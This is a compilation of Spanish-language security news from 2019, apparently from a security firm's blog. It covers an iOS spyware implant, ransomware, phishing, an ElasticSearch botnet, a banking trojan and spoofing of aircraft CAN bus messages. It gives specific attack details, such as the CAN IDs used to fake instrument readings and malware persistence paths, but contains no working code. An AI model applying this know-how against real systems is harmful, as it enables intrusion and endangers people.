Un análisis inicial indicó que al menos una de las cadenas de exploits para la escalada de privilegios era un 0-day, el cual no había sido solventado en el momento de su descubrimiento [enero] (CVE-2019-7287 y CVE-2019-7286).

El alcance de las versiones afectadas «apuntaban a un grupo que estaba haciendo un esfuerzo continuo para hackear a usuarios de iPhone en ciertas comunidades durante un periodo de tiempo de al menos dos años». Añadía Beer que la raíz de las vulnerabilidades revelaban código que, aparentemente, nunca había sido desarrollado correctamente, al cual le faltaban controles de calidad, o que «probablemente casi no se sometió a pruebas o revisiones antes de ser entregados a los usuarios (los dispositivos)».

Google informó sobre estos problemas a Apple en enero, lo que resultó en el lanzamiento apresurado de iOS 12.1.4 en febrero de 2019, el cual no estaba programado para esa fecha; las vulnerabilidades se dieron a conocer públicamente en ese momento.

Detalles del módulo

El payload del malware usado en el ataque es algo personalizado y desarrollado para realizar tareas de monitorización. Este payload hace peticiones mediante comandos desde un servidor C&C (C2) cada sesenta segundos, y se centra principalmente en robar archivos y obtener datos de localización en tiempo real. El análisis de Beer mostró que se pueden evitar algunas de las medidas de seguridad usadas por disidentes para, por ejemplo, proteger su privacidad (y en muchos casos su seguridad física).

Según el investigador, los atacantes usaron las cadenas de exploits para conseguir ejecutar código fuera de un entorno sandbox como usuario rooten los iPhones. Tras lograr esto, los atacantes ejecutaban «posix_spawn«, pasando la ruta al módulo, el cual era almacenado en /tmp; esto hacía que el módulo corriese en segundo plano con privilegios root.

«El implante se ejecuta en el espacio del usuario, aunque fuera de un entorno sandbox y con privilegios de root seleccionados por el atacante para asegurarse de que puede seguir accediendo a la información privada en la que estaban interesados», detallaba Beer. «Usando jtool, podemos ver los privilegios que tiene el módulo… los atacantes tienen control total sobre estos, ya que usaban el exploit para el kernel con el objetivo de añadir el hash del código del módulo a la caché del kernel«.

Durante la prueba, Beer fue capaz de usar el malware para robar archivos de la base de datos de un teléfono infectado, el cual era usado por aplicaciones de mensajería instantánea cifrada de extremo a extremo como WhatsApp, iMessage y Telegram – lo cual significa que pudo hacerse con el texto plano de los mensajes enviados y recibidos.

Ejemplo de robo de información de mensajería instantánea cifrada de extremo a extremo
Fuente de la imagen: The Hacker News

Esta misma técnica podía ser usada en todo el dispositivo.

«El implante puede subir archivos privados usados por todas las aplicaciones del dispositivo, como por ejemplo el contenido en texto planode emails enviados con la aplicación Gmail, los cuales eran subidos al servidor del atacante», comunicaba Beer.

El implante también realiza copias de los contactos del usuario (nombres completos y números de teléfono) almacenados en la agenda de contactos del iPhone, copias de fotos, y puede hacerse con la localización en tiempo real del usuario, actualizando esta última información hasta una vez por minuto si el dispositivo está conectado a alguna red.

Los atacantes podrían conseguir la persistencia en el dispositivo infectado mediante el robo de tokens usados por servicios como iOS Single-Sign-On de Google. Dicha información será transmitida al atacante y podrá ser usada para tener acceso a la cuenta de Google del usuario incluso una vez el implante deje de ser ejecutado. Para que el módulo deje de correr en el dispositivo será necesario reiniciarlo, e incluso así, si tras el reinicio el usuario volviese a visitar el sitio web comprometido, la infección tendría lugar nuevamente.

La dirección IP del servidor a la que se suben los archivos se encuentra incrustada en el binario del módulo, algo que algunos investigadores que se han pronunciado sobre el asunto consideran un «error amateur» frente a la sofisticación de los Zero Days explotados, llegando a especular que tras el ataque se encuentra un estado cuyo objetivo es monitorizar a un grupo concreto de la población y que habría comprado el 0-day por una importante suma de dinero, siendo sus desarrolladores, aparentemente recién iniciados en el mundo del ciberespionaje de acuerdo a los investigadores, quienes se encargaron de desarrollar el malware e introduciendo en su estructura la dirección IP del servidor, lo cual podría facilitar la localización del grupo atacante.

Junto al robo de información privada de los usuarios, igualmente preocupante resulta el hecho de que nada está cifrado -todo se envía al C2 vía HTTP (no HTTPs), abriendo la posibilidad de que los datos sean filtrados a otras personas. Este es otro aspecto que hace pensar a algunos investigadores que el grupo atacante es relativamente inexperto. «Si te conectas a una red de Wi-Fi no cifrada esta información estará siendo transmitida a todo aquel que está a tu alrededor, a tu operador de red y a cualquier intermediario hasta llegar al servidor de Control y Comando», informaba Beer.

En cuanto a los usuarios, estos no se habrían dado cuenta de que habían sido infectados, permitiendo así que el binario obtuviese la información personal durante todo el tiempo que el usuario permaneciera sin reiniciar el dispositivo. «No hay un indicador visual que muestre que se está ejecutando el implante en el dispositivo. No hay manera de que un usuario de iOS vea una lista de procesos, de manera que el binario del módulo no intenta ni siquiera esconder su ejecución en el sistema», según lo reportado por el investigador.

Los sitios webs usados para el ataque tenían como objetivo cierto grupo de personas. Aunque no dijo explícitamente si se trataba de personajes del mundo de la política o grupos demográficos, Beer dio a entender que se trataba del primer grupo. Tampoco se tiene información sobre quién se encuentra detrás del ataque, pero tanto la sofisticación del ataque como su objetivo de espionaje sugiere, como se ha mencionado previamente, que se trata de un grupo de hackers respaldados por un estado.

Ian Beer explica que es necesario dejar a un lado la noción de que cualquier usuario de iPhone que haya podido ser hackeado es «el disidente del millón de dólares» (un nickname que se le dio al activista de derechos humanos de Emiratos Árabes Unidos, Ahmed Mansour, actualmente encarcelado, después de que su iPhone fuese hackeado). El nickname «disidente del millón de dólares» vino por lo costoso que se estimó que fue el proceso de hackear el iPhone de este activista, y con respecto a esto Beer dice que no tiene intención de iniciar una conversación sobre cuánto cuesta una campaña como la tratada en este artículo, pero dice que todos los precios dados «parecen bajos considerando la capacidad de monitorización de las actividades privadas de poblaciones enteras en tiempo real».

El investigador también dijo que los sitios web infectados, los zero-days y losexploits descubiertos por Google durante la investigación son más bien la punta del iceberg, aclarando que «todavía hay muchos otros que están por verse».

Desde Hispasec Sistemas no solo recomendamos que los usuarios mantengan sus dispositivos actualizados; también secundamos el consejo proporcionado por Beer, quien advirtió a los usuarios alentándoles a que fuesen más precavidos ante la amenaza real de los ciberataques, y a que consideren dónde podría acabar un día toda la información que se encuentra en sus dispositivos.

Más información:

iPhone Zero-Days Anchored Watering-Hole Attacks

The Million Dollar Dissident

Hack Exploited Apple Users for Two Years

Mysterious iOS Attack Changes Everything We Know About iPhone Hacking

Google Uncovers How Just Visiting Some Sites Were Secretly Hacking iPhones For Years

Noticias de Seguridad Agosto 2019

El Banco Central Europeo cierra el portal «BIRD» tras sufrir un ataque

El Banco Central Europeo ha confirmado que ha sido víctima de un ciberataque exponiendo información de contacto de sus subscriptores

Con sede en Alemania, el BCE es el banco central de los 19 países europeos que han adoptado el euro como moneda única y es el responsable de supervisar las políticas de protección de los sistemas bancarios de estos países.

A través de un comunicado publicado el jueves, el BCE informó de una brecha de seguridad producida en la web de su sistema BIRD (Banks’ Integrated Reporting Dictionary – Banco Internacional de Reconstrucción y Desarrollo), que estaba alojada en un proveedor diferente al resto de la infraestructura del Banco Central.

Lanzado en 2015, BIRD es la institución del Banco Mundial encargada de la financiación, asistencia y apoyo a las economías del Segundo Mundo o economías en proceso de desarrollo.

En el momento de escribir esta noticia, la web de BIRD muestra un aviso a los visitantes indicando que el sitio está caído por labores de mantenimiento.

Según la agencia Reuters, hay evidencias de que el sitio web de BIRD fue comprometido en diciembre de 2018, aunque la brecha de seguridad ha sido descubierta la pasada semana durante una labor de mantenimiento rutinaria.

Los atacantes instalaron malware en la máquina que aloja BIRD para hospedar software de phishing, lo que les pudo haber permitido robar información de emails, nombres y cargos laborales de 481 subscriptores.

El BCE asegura que la información robada no contiene contraseñas y que sus sistemas internos no se han visto afectados ya que la infraestructura de BIRD está físicamente separada del resto de sistemas críticos.

Esta no es la primera vez que el BCE se ve afectado por una brecha de seguridad; En 2014, unos atacantes desconocidos lograron comprometer la base de datos asociada al sitio web principal del Banco Central, exponiendo los datos de contacto de las personas registradas a los eventos celebrados por el Banco Central.

Más Información:

https://www.ecb.europa.eu/press/pr/date/2019/html/ecb.pr190815~b1662300c5.en.html
https://www.bbc.com/news/business-28458323
https://thehackernews.com/2019/08/european-central-bank-hack.html

Sodin, el ransomware que se aprovecha de los MSP

A finales de marzo de este mismo año Kaspersky informaba sobre un nuevo vector de ataque para los ciberdelincuentes. Se trata de los proveedores de servicios gestionados (MSP – Manage Service Provider), un objetivo que puede llegar a ser muy lucrativo.

En especial, el ransomware Sodin (también conocido como Sodinokibi y REvil) ha dado muchos quebraderos de cabeza a diferentes expertos en el mundo de la seguridad. Sodin aprovechó una vulnerabilidad en servidores Oracle WebLogic para introducirse en los sistemas de los MSP y, además, no es necesaria la participación del usuario para activarse.

Propagación de Sodin

Los atacantes aprovecharon la vulnerabilidad CVE-2019-2725 para ejecutar un comando en PowerShell en un servidor de Oracle WebLogic y cargar undropper (Software diseñado para instalar algún tipo de malware) que, más tarde, instalaría el ransomware Sodin.

En abril, Oracle lanzó los parches para corregir la vulnerabilidad de la que hablamos más arriba, pero a finales de junio se descubrió la vulnerabilidadCVE-2019-2729, similar a la anterior.

En algunos casos los atacantes utilizaron las consolas de acceso en remoto Webroot y Kaseya para enviar el troyano. En otros casos los atacantes consiguieron penetrar en la infraestructura de los MSP mediante una conexiónRDP y descargaron el ransomware en los ordenadores de los clientes.

Esquema criptográfico

Sodin utiliza un esquema híbrido para cifrar los archivos. el contenido del archivo es cifrado mediante el algoritmo salsa20, y las claves con un algoritmo asimétrico de curva elíptica.

Generación de la clave

La configuración de Sodin contiene el campo pk, que se guarda en el registro con el nombre sub_key; esta es la clave pública de 32 bytes del distribuidor del troyano.

cuando se ejecuta, el troyano genera un nuevo par de claves de sesión. la clave pública se guarda en el registro con el nombre pk_key, mientras que la clave privada se cifra usando el algoritmo ECIES, con la clave sub_key y se almacena en el registro con el nombre sk_key.

La misma clave de sesión privada también se cifra con otra clave pública codificada en el cuerpo del troyano. El resultado del cifrado se almacena en el registro con el nombre 0_key.

Si alguien conoce la clave privada correspondiente a la clave con la que se ha cifrado 0_key, puede descifrar los archivos de la víctima, incluso sin la clave privada para sub_clave. Todo indica que los desarrolladores del troyano crearon una forma de descifrar archivos a espaldas de los distribuidores.

fragmento del procedimiento de generación y almacenamiento

Cifrado de archivos

Durante el cifrado de cada archivo se genera un nuevo par de claves asimétricas, file_pub y file_priv. A continuación se calcula el SHA3-256 y el resultado se utiliza como clave simétrica para cifrar el contenido del archivo con el algoritmo Salsa20.

Además de los datos descritos anteriormente también se encuentra un archivo para la inicialización del cifrado Salsa20.

Los archivos cifrados reciben una nueva extensión arbitraria, la nota de rescate se guarda junto a los archivos cifrados y el fondo de pantalla generado por el malware se configura en el escritorio.

fondo de pantalla
demandas de los delincuentes

Como podemos ver, se está consiguiendo un grado muy alto de especialización y sofisticación por parte de los desarrolladores de malware que, a día de hoy, pone a prueba a los analistas de todo el mundo.

Más información:

https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025

Distribución de Phishings a través de servicios legítimos

Investigadores de ProofPoint han descubierto una nueva campaña de phishingque utiliza AWS (Amazon Web Services) para alojar las webs fraudulentas.

Distribución de Phishings a través de servicios legítimos

A finales de julio ProofPoint detectaba que algunos de sus phishings monitorizados estaban alojados en AWS, algo poco habitual dadas las restricciones a las que están sometidos para su temprana detección.

La tendencia en los ataques de phishing parece estar tomando un nuevo camino: cada vez se hace más habitual encontrar los kits fraudulentos en servicios de almacenamiento en la nube como GitHubDropbox Google Drive.

Pero no solo están almacenando los kits en la nube, además aprovechan servicios como WeTransfer DocuSign para distribuir páginas que redirijan a los phishing y eludir así las defensas del correo electrónico a la hora de comprobar si la URL es fraudulenta. Los atacantes aprovechan un servicio legítimo que genera una falsa confianza en la víctima de la que aprovecharse para que haga clic en el correo y abra el archivo HTML que la redirija a la página fraudulenta.

Algo similar está ocurriendo con AWS. Los cibercriminales están utilizando diferentes técnicas de codificación mediante JavaScript para evitar que las páginas sean detectadas como una amenaza. Hay que tener en cuenta que los atacantes buscan en todo momento no ser detectados, por ello han incrementado el uso de plataformas de almacenamiento en la nube para alojar estas páginas falsas.

Como ya hemos visto, AWS no es la única empresa que se está viendo afectada por este problema. Otras como Microsoft Github lo han sufrido.

Más información: 

Proofpoint
https://www.proofpoint.com/us/threat-insight/post/phishing-actor-using-xor-obfuscation-graduates-enterprise-cloud-storage-aws

Ataque de ransomware vía RDP afecta a las PYMES

A lo largo de la historia del ransomware hemos visto diferentes vectores de ataque. En esta nueva entrada vamos a descubrir cómo los atacantes utilizan el protocolo RDP de Microsoft para introducir el ransomware en los equipos de sus vícitimas.

El protocolo RDP es utilizado habitualmente para conectarse de forma remota a los escritorios de oficinas, por lo que se ha convertido en un vector de ataque atractivo para los ciberdelincuentes y que puede causar la parálisis de una PYME con una alarmante facilidad.

La siguiente imagen es una búsqueda de escritorios remotos en Shodan. Como podemos ver, Shodan nos devuelve casi 5 millones de resultados(51.154 dispositivos encontrados en España), lo que no quiere decir que todas ellas tengan RDP activo, el grueso de la búsqueda solo serán dispositivos con el puerto 3389 abierto, pero podemos intuir que hay un gran número de posibles víctimas, y muchas de ellas pertenecerán a empresas y organizaciones que pueden quedar paralizadas si sus datos son comprometidos.

¿Cómo explotan los cibercriminales RDP?

Existen dos vectores de ataque distintos, hemos visto ataques que explotan vulnerabilidades en RDP y que son algo más sofisticados pero la gran mayoría de las intrusiones en los sistemas que utilizan este protocolo se han llevado a cabo utilizando fuerza bruta para romper contraseñas débiles, o mucho más fácil, buscar las contraseñas en BBDD leakeadas.

Una vez que los atacantes tienen acceso al equipo de la víctimas solo tienen que desactivar manualmente el antivirus que se esté utilizando e instalar el software de rescate para infectar el equipo.

Los resultados de un ataque de ransomware pueden resultar devastadores para las PYMES pero no solo afecta al pequeño comercio, se han dado casos de hospitales que han sido infectados y han tenido que pagar el rescate para poder tener acceso a sus archivos.

En el último año grupos como Matrix y SamSam han ido abandonando los distintos vectores de ataque para dedicarse casi por completo a la infección por RDP. Como ya vimos en este mismo blog el pasado 31 de mayo, más de 1 millón de máquinas eran vulnerables a BlueKeep (CVE-2019-0708), lo que podría desencadenar un «brote de ransomware por todo el mundo en cuestión de horas» según Matt Boddy, experto en seguridad de Sophos.

Según explicó Matt, en la actualidad hay más de 3 millones de dispositivos vulnerables a ataques por RPD, se ha estado informando sobre cómo todos los honeypots fueron descubiertos en pocas horas para su explotación, tan solo porque estaban expuesto en Internet.

La conclusión que nos aportaba era la de reducir el uso del protocolo RDP siempre que sea posible y utilizar contraseñas robustas que dificulten los ataques por fuerza bruta. Todas las empresas deben actuar en consecuencia e implementar protocolos de seguridad que ayuden a minimizar el riesgo y la exposición para protegerse contra estos cibercriminales.

Más información:

PDF Infrome Sophos

Descubierta vulnerabilidad que permite manipular pequeñas avionetas

El Department of Homeland Security de los estados unidos ha publicado una alerta avisando a los propietarios de aviones pequeños y pidiendo que realicen las mitigaciones recomendadas para evitar que un atacante se aproveche de la vulnerabilidad para tomar el control de la avioneta.

La vulnerabilidad descubierta y publicada en este reporte de Rapid7, reside en las implementaciones modernas del bus de datos CAN (Controller Area Network), un popular estándar de redes que se aplica en algunos vehículos y aeronaves que posibilita que los microcontroladores y dispositivos se comuniquen entre sí.

La investigación llevada a cabo en los laboratorios de Rapid7 empleó el el uso de dos sistemas de dos fabricantes distintos para realizar el ataque. Lo que encontraron fue:

Fabricante X

En la implementación realizada por el que llamaremos: Fabricante X, se descubrió que el CAN ID 0x205 era el responsable de la presión y temperatura del aceite además de las lecturas de temperatura de dos culatas. Enviando un mensaje elaborado utilizando este CAN ID, en Rapid7 fueron capaces de enviar mensajes falsos relativos a la presión, temperatura del aceite y lecturas falsas de la temperatura de dos culatas.

También se identificaron, para esta implementación, algunos CAN ID más como el 0x241 que es el encargado de la brújula o los 0x281-284, encargados de la altitud y el sistema de referencia de rumbo (AHRS), actuando el AHRS como nodo 1. Los nodos 2,3 y 4 hacían referencia a los IDs 0x291-294, 0x2A1-2A4 y 0x2B1-2B4 respectivamente.

Los mensajes de AHRS fueron modificados mediante ingeniería inversa utilizando mensajes de falsificados de unidades AHRS inexistentes, logrando cambiar la altitud de la aeronave mostrada, lo que muestra una posición incorrecta de la avioneta.

CAN IDs falsificados. Fuente: rapid7.com

La naturaleza del bus de datos CAN permite a cualquier dispositivo con acceso físico a los a los CANs enviar mensajes falsos al bus. Los paquetes CAN no disponen de ninguna dirección de destino ni ningún otro mecanismo de autenticación, lo que presenta el problema de no poder identificar quién está enviando dichos mensajes. Esta característica lo hace especialmente sencillo de implementar, pero dificulta mucho su configuración de forma segura al utilizar un medio compartido y, como hemos hecho alusión, no presentar ningún mecanismo de identificación.

Fabricante Y

Por otro lado, en la implementación realizada por el que llamaremos Fabricante Y, Rapid7 identificó el CAN ID 0x10342200 era el encargado de controlar y mostrar la presión del aceite. Rapid7 fue capaz de mostrar cómo, creando mensajes elaborados y utilizando este CAN ID, eran capaces de enviar lecturas falsas relativas a la presión del aceite.

Paquetes CAN manipulados. Fuente: rapid7.com

También se detectó que la brújula electrónica utilizaba CAN ID 0x10A8200 0x10A82100 para estos mensajes. El CAN ID 0x10A8200 actuó como un paquete de encabezado, con el tercer byte actuando como un indicador de longitud. Los campos de rumbo magnético, tiempo y fuerza del campo magnético fueron modificados por técnicas de análisis de protocolo estándar.

Mensaje de la brújula de la aeronave. Fuente: rapid7.com

Algunas mitigaciones

Como se ha visto, muchas de estas vulnerabilidades derivan de problemas de seguridad física. El DHS así lo menciona y da algunas recomendaciones en la sección de «Mitigations» de la alerta publicada. Entre sus propuestas como posibles mitigaciones tenemos:

  • Restringir lo mejor posible los accesos físicos a las aeronaves.
  • Realizar un análisis de impacto y uno de evacuación para así poder elaborar medidas de seguridad efectivas

Más información:

ICS Alert (ICS-ALERT-19-211-01)
https://www.us-cert.gov/ics/alerts/ics-alert-19-211-01

Investigating CAN Bus Network Integrity in Avionics Systems
https://www.rapid7.com/research/report/investigating-can-bus-network-integrity-in-avionics-systems/

Vulnerabilidad en ElasticSearch: bases de datos convertidas en Botnet «Zombies»

ElasticSearch, un motor de análisis con el que se pueden realizar búsquedas muy rápidas, escrito en Java y partícipe de la filosofía del desarrollo de código abierto, se ha convertido en uno de los objetivos de los cibercriminales en la actualidad debido al aumento de su popularidad. Recientemente se ha descubierto una nueva vulnerabilidad que compromete su funcionamiento: la transformación de sus bases de datos en botnets destinadas a realizar ataques de denegación de servicios distribuidos (DDoS). Este ataque es realizado a partir del malware Setag, con trazas del malware BillGates, descubierto por primera vez en 2014.

Para llevar a cabo el ataque, el malware se aprovecha de las bases de datos o servidores de ElasticSearch que, o bien son públicos, o han sido expuestos. El ataque es realizado en dos fases diferentes:

1ª FASE: el dropper ejecuta el script s67.sh, el cual define qué shell usar y dónde encontrarla, tratando posteriormente de deshabilitar el firewall. Se descargará entonces un segundo script (s66.sh) usando el comando curl (o wget en caso de que el comando curl no funcione).

Fragmentos de código del script de la 1ª fase
Fuente la imagen: Trend Micro

2ª FASE: el segundo script descargado también define qué shell usar y deshabilita el firewall del sistema. En cambio, este script eliminará algunos archivos posiblemente relacionados con la minería de criptomonedas, así como otros de configuración almacenados en el directorio /tmp. Después el script matará algunos de estos procesos que tienen que ver con la minería de criptomonedas, entre otros. El siguiente paso será eliminar los rastros de la infección inicial y matar procesos que tienen lugar en puertos TCP. En esta segunda etapa también se descargan los binarios.

Fragmentos de código del script de la 2ª fase y los procesos que mata
Fuente de la imagen: Trend Micro
Fragmentos de código que muestran cómo se matan los procesos en puertos TCP
Fuente de la imagen: Trend Micro

Los atacantes hacen uso de dominios desechables, ya que éstos permiten cambiar las URLs cuando son detectadas. Además, el uso de sitios web comprometidos también permite al atacante evadir cierto tipo de detecciones. Estas páginas web comprometidas contienen el payload a descargar.

Cadena de infección del ataque
Fuente de la imagen: Trend Micro

En cuanto a los binarios, Trend Micro detectó una backdoor variable que roba información sobre el sistema y que tiene la capacidad de iniciar ataques DDoS. Estas muestras contienen rasgos característicos del malware BillGates, aparecido por primera vez en 2014 y conocido por provocar secuestros de sistemas y ataques DDoS, funcionalidades que también se encuentran en Setag. El payload cuenta con código que previene acciones de debugging y además revisa si el archivo ha sido manipulado. Este malware también reemplaza las herramientas de sistema afectadas con una copia propia y las transfiere al directorio /usr/bin/dpkgd. Para lograr la persistencia se ejecuta un script que crea una copia de sí mismo en las siguientes rutas:

  • /etc/rc{1-5}.d/S97DbSecuritySpt
  • /etc/rc{1-5}.d/S99selinux
  • /etc/init.d/selinux
  • /etc/init.d/DbSecuritySpt
Fragmentos de código:
1. Anti-debugging (arriba a la izquierda)
2. Ejecución en etapas múltiples (arriba en el centro)
3. Tipos de ataques DDoS (arriba a la derecha)
4. Lista de herramientas que reemplaza (abajo)
Fuente de la imagen: Trend Micro

Como conclusión, se recomienda a cualquier empresa que use ElasticSearch que esté al tanto de las posibles vulnerabilidades que vayan apareciendo, y que de la misma forma implementen el parche publicado por ElasticSearch para solucionar el problema actual.

Más información

Multistage Attack Delivers BillGates/Setag Backdoor, Can Turn Elasticsearch Databases into DDoS Botnet ‘Zombies’

New malware attack turns Elasticsearch databases into DDoS botnet

¿Qué es y cómo funciona Elasticsearch?

Investigadores de ‘Project Zero’ publican exploits remotos para iOS

Los investigadores han publicado finalmente pruebas de concepto detalladas de exploits que podrían aprovechar de forma remota vulnerabilidades existentes en el código de iOS de Apple a través de un mensaje especialmente elaborado y enviado vía iMessage

Según las pruebas de concepto, la explotación de algunas de estas vulnerabilidades no requeriría de intervención alguna por parte del usuario, lo que eleva la clasificación del riesgo de estas brechas. Todas fueron reportadas a Apple por Samuel Gross y Natalie Silvanovich, miembros de Project Zero. La compañía parcheó las vulnerabilidades la semana pasada con su actualización 12.4 para iOS.

De esas vulnerabilidades descubiertas, al menos cuatro no requieren de intervención alguna del usuario y tendrían que ver con fallos de corrupción de memoria que tienen lugar cuando se intenta acceder a la misma una vez ha quedado liberada. Este fallo podría, según los investigadores, permitir la ejecución de código arbitrario en aquellos dispositivos iOS afectados. 

Los investigadores, sin embargo, aún no han publicado todas las vulnerabilidades descubiertas. Dado que una de ellas (CVE-2019-8641) no ha sido mitigada en la última actualización, el equipo de Project Zero ha decidido mantenerla en privado por ahora.

Otra de las vulnerabilidades, catalogada como CVE-2019-8646, responde a un fallo de tipo ‘lectura fuera de límites’ que puede ser aprovechado de forma remota simplemente mediante el envío de un mensaje vía iMessage. Pero, en vez de la ejecución de código arbitrario, este fallo permite la lectura del contenido de archivos guardados en el dispositivo iOS de la víctima, gracias a la filtración de memoria.

A continuación enumeramos las vulnerabilidades publicadas y los enlaces asociados a cada una de ellas:

Dado que ya han sido publicadas pruebas de concepto que explotan con éxito estos fallos, es muy recomendable la actualización de todos los dispositivosiOS, ya sean iPhoneiPad o iPod a la última actualización para iOS 12.4.

Ataque basado en tiempo permite saber si estás usando el modo incógnito de Chrome

La API del sistema de archivos de Chrome es mucho más rápida en modo incógnito, lo que permite conocer si se está utilizando este modo.

A partir de la versión 76 de Google Chrome se añadió como novedad una implementación de la API FileSystem (API de Sistema de Archivos) para el modo incógnito. Esta novedad se incluyó para prevenir que los sitios web pudiesen saber si este modo estaba en uso en función de la disponibilidad de esta API.

No obstante, la implementación que realiza no escribe a disco como es habitual, sino a memoria. Estas escrituras resultan mucho más rápidas yestables, lo que permite diferenciar fácilmente si el modo incógnito está en uso. Además, en esta modalidad la cuota de disco asignada es mucho menor, lo que ayuda a diferenciarlo.

Gráfica comparando la velocidad de escritura de ambas modalidades. Fuente: blog.jse.li.

El problema ya era conocido desde 2018 por los mismos desarrolladores de Chrome, proponiendo como alternativa cifrar los datos a disco y mantener los metadatos en memoria. No obstante, tal y como sugiere el investigador Jesse Li, que ha realizado esta investigación, cifrar los datos a disco dejaría evidencias para el resto de usuarios del sistema de que se está usando el modo incógnito por la mera existencia de estos ficheros cifrados y su tamaño.

El investigador ha publicado una Prueba de Concepto (PoC) para que cualquiera pueda comprobar en su máquina los resultados de su estudio, la cual también cuenta con una demo en su sitio web.

Más información:

Detecting incognito mode in Chrome 76 with a timing attack:
https://blog.jse.li/posts/chrome-76-incognito-filesystem-timing/

chrome-filesystem-timing:
https://github.com/veggiedefender/chrome-filesystem-timing

Demo:
https://jse.li/chrome-filesystem-timing/

Noticias de Seguridad Julio 2019

Nuevo troyano bancario basado en una extensión de Chrome afecta a entidades Latinoaméricanas

En los últimos días se ha detectado en Hispasec un nuevo troyano bancario que utiliza una extensión de Chrome para robar las credenciales de acceso bancario.

El pasado 23 de julio llegó a los sistemas de detección y análisis de malware de Hispasec una nueva muestra de troyano bancario que utiliza un nuevo esquema para el robo de datos bancarios.

Este nuevo esquema de funcionamiento incluye dos componentes principales:

  • Configuración de un proxy malicioso en la configuración del sistema operativo.
  • Uso de una extensión maliciosa para el navegador Google Chrome que se encarga de redirigir las peticiones a las páginas web que alojan el phishing bancario.

Infección

La infección se lleva a cabo a través de un script para «wscript», que actua de ‘dropper‘, y cuyo código se encuentra muy ofuscado. Este script es el encargado de instalar los dos componentes necesarios.

En primer lugar configura el sistema para utilizar un servidor proxy malicioso que se encargará de resolver y responder las peticiones realizadas a la web de phishing.

Configuración del proxy a través del registro del sistema

Como se puede observar en la imagen, el script modifica el valor del registro «AutoConfigURL» para la configuración de Internet, lo que permite no solo configurar un proxy malicioso en el equipo, sino también mantener actualizada la dirección IP del proxy a utilizar.

A continuación, el script descarga un fichero comprimido en formato ZIP que contiene la extensión maliciosa para Google Chrome y un instalador legítimo de Google Chrome Canary.

Una vez descargado el ZIP, lo descomprime e inicia el instalador de Google Chrome, sin importar si ya existe una versión de Google Chrome instalada en el equipo. Una vez instalado y configurado el navegador, se configura como navegador predeterminado.

Robo de Credenciales

En este momento, entra en juego la extensión maliciosa, que solicita al navegador permisos para interceptar las peticiones web a los dominios de las entidades bancarias afectadas y bloquearlas.

Permisos solicitados por la extensión en el «manifest.json»

Con estos permisos, la extensión puede detectar el acceso por parte del usuario a la web del banco, y redirigir la petición a otra URL en la que se aloja la web de phishing para robar las credenciales de acceso.

Código que intercepta y redirige las peticiones

Como podemos apreciar, las redirecciones para cada entidad se realizan a subdominios «ww«, en lugar del habitual «www«. Esto reduce la posibilidad de que el usuario detecte que no se trata del dominio habitual.

Estos subdominios no se encuentran en uso, por lo que será el servidor proxy malicioso el encargado de resolver los nombres de dominio y responder con el contenido de la web de phishing.

Web de phishing resuelta y servida por el servidor proxy malicioso

Entidades afectadas

Las entidades afectadas por este troyano bancario son entidades de Latinoamérica, entre las que se encuentran BBVA, Banco Santander, BCI o Scotia Bank.

Conclusiones

Tras el análisis realizado por el equipo de análisis de malware de Hispasec, podemos ver que se trata de un nuevo esquema de funcionamiento de troyano bancario. Si bien es cierto que existen troyanos conocidos como «ProxyChanger» que modifican la configuración del sistema para añadir un proxy malicioso que se encargue del robo de datos, en este caso se introduce un componente adicional como es la extensión de Google Chrome que apoya el ataque y lo hace efectivo.

Este tipo de ataques, permiten pasar más desapercibidos, puesto que los motores antivirus no están suficientemente preparados para la detección de extensiones maliciosas para el navegador, además de hacer el ataque más difícil de identificar por parte del usuario.

Aunque el código del dropper se encuentra muy ofuscado, no ocurre lo mismo con el código de la extensión. Además, la funcionalidad de la extensión es bastante simple y se limita a realizar una redirección hacia un subdominio que pasará desapercibido para el usuario. Esto nos invita a pensar que se trata de una primera versión del malware, y que en el futuro podríamos encontrar nuevas versiones más complejas e incluso versiones que afecten a nuevas entidades bancarias más allá de Latinoamérica.

IOCs

Si desea más información sobre el troyano, como los indicadores de compromiso o los hash de las muestras, contacte con nuestro departamento de malware escribiendo un correo electronico a: malwaredept@hispasec.com

VLC no es vulnerable y no tienes que desinstalarlo

La vulnerabilidad llevaba parcheada 16 meses y no formaba parte VLC, aunque un cúmulo de malas prácticas han permitido que la noticia llegue hasta los medios

Esta no es una noticia sobre una nueva vulnerabilidad como estamos acostumbrados, sino sobre los medios, el sector de la seguridad y la falta de rigor. VLC, uno de los reproductores más populares, se ha visto sumido en una campaña de desprestigio solicitando su desinstalación por un fallo ya parcheado desde hace más de un año.

La vulnerabilidad de la disputa se encuentra en la biblioteca libebml, encargada de interpretar los metadatos XML de los vídeos Matroska (MKV) y no en el código de VLC. Dicha vulnerabilidad que permitía la ejecución remota de código (RCE) ya fue solucionada hace 16 meses, e incluida con la versión 3.0.3 de VLC hace más de un año, siendo la versión actual la 3.0.7.

La razón por la que el analista de seguridad que «redescubrió» la vulnerabilidad pudo reproducirla se debe a que estaba usando una versión sin soporte de Ubuntu. En vez de contrastar si su versión era la última y qué versiones eran vulnerables, abrió un reporte por el canal incorrecto, notificándose en el bugtracker de VLC en vez de por el email privado de seguridad preparado para ello. Debido a que el fallo no era reproducible en sistemas actualizados y a la falta de información, el reporte no pudo tratarse.

Al mismo tiempo, MITRE abría un CVE para la vulnerabilidad sin contactar con el equipo de VLC a pesar de violar sus propias políticas, y por si fuera poco NVD no respondía a las peticiones de VLC solicitando que se corrigiera la información del CVE. La vulnerabilidad recibió además la puntuación de 9.8 (crítica) siendo la correcta 5.5 (ya corregida).

La prensa en vez de contrastar o comprobar en qué consistía el fallo se apresuró a publicar noticias alarmistas por la vulnerabilidad, siendo el detonante la escrita en Gizmodo con título «You Might Want to Uninstall VLC. Immediately». Por supuesto, otros medios se hicieron eco de la noticia con titulares del mismo tipo.

Los medios ya están actualizando las noticias publicadas, pero el daño ya está hecho. La reputación de VLC se ha visto dañada, y muchos usuarios habrán desinstalado el reproductor a pesar de no existir riesgo en la actualidad.

Más información:

A thread written by @videolan:
https://threader.app/thread/1153963312981389312

Ciberataque en Bulgaria: filtrada información privada de millones de ciudadanos.

El presunto responsable, Christian Boykov, detenido hace unos días, ha sido puesto en libertad recientemente. Aprovechó fallos graves de seguridad de la NRA – el equivalente búlgaro de nuestro Ministerio de Hacienda – para conseguir información sensible de millones de ciudadanos del país.

Imagen de archivo de Christian Boykov

